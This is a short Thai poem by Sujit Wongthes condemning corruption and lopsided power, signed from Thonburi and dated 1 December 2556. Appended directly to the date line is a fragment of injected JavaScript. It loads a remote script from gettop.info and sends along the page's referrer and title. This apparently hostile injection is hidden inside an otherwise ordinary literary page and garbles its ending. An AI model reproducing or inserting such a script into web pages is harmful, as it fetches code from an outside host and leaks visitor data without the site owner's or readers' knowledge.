ขี้ฉ้อคอร์รัปชั่นต้องเฉดฉาด

ความเหลื่อมล้ำอำนาจต้องขาดคว่ำ

ข้ามบุคคลที่เห็นเป็นขาวดำ

ก็เห็นโครงสร้างอำนาจลำเอียง

แก้ไม่ได้หรือไม่แก้ย่อมแย่ยอด

ไปไม่รอดเหลวแหลกแตกเสี่ยงเสี่ยง

คนส่วนน้อยได้มากหนักลำเลียง

คนส่วนมากได้เพียงพอน้อยน้อย

 

สุจิตต์  วงษ์เทศ

บ้านช่างหล่อ กรุงธนบุรี

1 ธันวาคม 2556s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;